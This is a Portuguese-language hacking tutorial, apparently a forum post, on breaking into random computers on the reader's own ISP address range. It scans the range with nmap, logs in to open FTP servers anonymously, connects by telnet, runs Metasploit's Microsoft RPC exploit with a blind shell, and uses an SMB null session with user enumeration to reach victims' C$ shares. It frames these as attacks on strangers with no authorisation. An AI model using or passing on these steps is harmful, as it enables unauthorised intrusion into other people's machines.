Invasão pelas portas 21; 23 ; 135; 445

Estou a fazer este tutorial, porque pediram-me. Mas eu odeio este tipo de ataque, pois esse tipo de ataque não satisfaz as nossas necessidades. UMA PERGUNTA: porque pessoas gostam de ficar a invadir computadores aleatoriamente sem saber donde é aquele computador, sem saber de nada?

Eu mesmo respondo. Estas pessoas são "lammers" que vão tentando invadir tudo e qualquer sistema para se gabar para os seus amigos.

Um conselho para todos vocês que sabem invadir ou estão aprender: TU NÃO PRECISAS de DIZER A NINGUÉM QUE SABES SABE INVADIR, POIS QUANDO SURGIR A OPORTUNIDADE, SURPREENDES OUTRAS PESSOAS!

Um tutorial bem simples que é ainda muito usado nos dias de hoje (por lammers).

Invasão pelas portas:

21: FTP

23: TELNET

135: RPC

445: COMPARTILHAMENTO


Vamos começar:

"saque" o seu ip externo(sugestão: www.myip.com).

Faça download do o nmap e instale no seu pc.

Vamos supor que o teu ip seja: 201.33.22.18.

Entre no prompt do Windows e digite nmap. Aparecerá um montão de opções e ajudas para aprenderes a utiliza-lo.

Prosseguindo…

Iremos fazer scanner de portas nos computadores da sua "rede WAN" ou seja de todos os computadores que utilizam o mesmo ISP que vocês...

digite:

nmap -sV -T Insane -A -v 201.33.22.1-254 -p21,23,135,44

Este comando vai listar todos os IP´s (máquinas) que estão a utilizar o mesmo ISP que vocês

Código:

Discovered open port 21/tcp on 201.33.22.223
Discovered open port 23/tcp on 201.33.22.1
Discovered open port 23/tcp on 201.33.22.186
Discovered open port 445/tcp on 201.33.22.14
Discovered open port 445/tcp on 201.33.22.97
Discovered open port 445/tcp on 201.33.22.24
Discovered open port 445/tcp on 201.33.22.152
Discovered open port 445/tcp on 201.33.22.149
Discovered open port 445/tcp on 201.33.22.81
Discovered open port 445/tcp on 201.33.22.69
Discovered open port 445/tcp on 201.33.22.9
Discovered open port 445/tcp on 201.33.22.55
Discovered open port 445/tcp on 201.33.22.113
Discovered open port 445/tcp on 201.33.22.218
Discovered open port 445/tcp on 201.33.22.21
Discovered open port 445/tcp on 201.33.22.107
Discovered open port 445/tcp on 201.33.22.111
Discovered open port 445/tcp on 201.33.22.56
Discovered open port 445/tcp on 201.33.22.178
Discovered open port 445/tcp on 201.33.22.191
Discovered open port 445/tcp on 201.33.22.157
Discovered open port 445/tcp on 201.33.22.127
Discovered open port 445/tcp on 201.33.22.29
Discovered open port 445/tcp on 201.33.22.207
Discovered open port 135/tcp on 201.33.22.175
Discovered open port 135/tcp on 201.33.22.164

Invasão pela porta 21

vamos lá… irá aparecer um conjunto de computadores que têm a porta 21 aberta. Todos aqueles que tiverem a mesma aberta. podes tentar fazer login como anonymous, pois alguns administradores ou pessoas não se preocupam em retirar o user anonymous do ftp.

Iniciar>Executar>cmd>ftp>open>201.33.22.223>anonymous>a

Invasão pela porta 23

Iniciar>Executar>cmd>telnet>open>201.33.22 23

Invasão pela porta 135

CASO a porta 135 esteja aberta, podemos usar o METASPLOIT

abra o metasploit na interface web. procure pelo exploit MICROSOFT RPC.

depois disso escolha o tipo de conexão como: GERENIC\SHELL_BLIND_TCP

depois disso mantenha as informações por defeito do metasploit que só inclua o ip da vitima.

Invasão pela porta 445

Esta porta é de partilha... SMB

Iniciar>Executar>cmd>net use \\201.45.241.175\ipc$ “” /u:”"

Comando concluído com êxito.
Faça Download do Dumpusers

guarde no C:\
abra o cmd e digite;

dumpusers -target 201.45.241.175 -type notdc -start 1 -stop 900 -mode verbose

depois vai ao:

iniciar>executar>\\201.45.241.175\c$

Pessoal este tipo de invasão é uma das mais ridículas. Não têm "pica"...
Mas pronto, fiz este tutorial a ouvir um gajo a dizer que na infomática nada é seguro, como se ninguém soubesse.. e o facto de ele dizer que nada é seguro toda a gente olha para ele como se fosse um hacker (para mim é um curioso)...

Cumprimentos...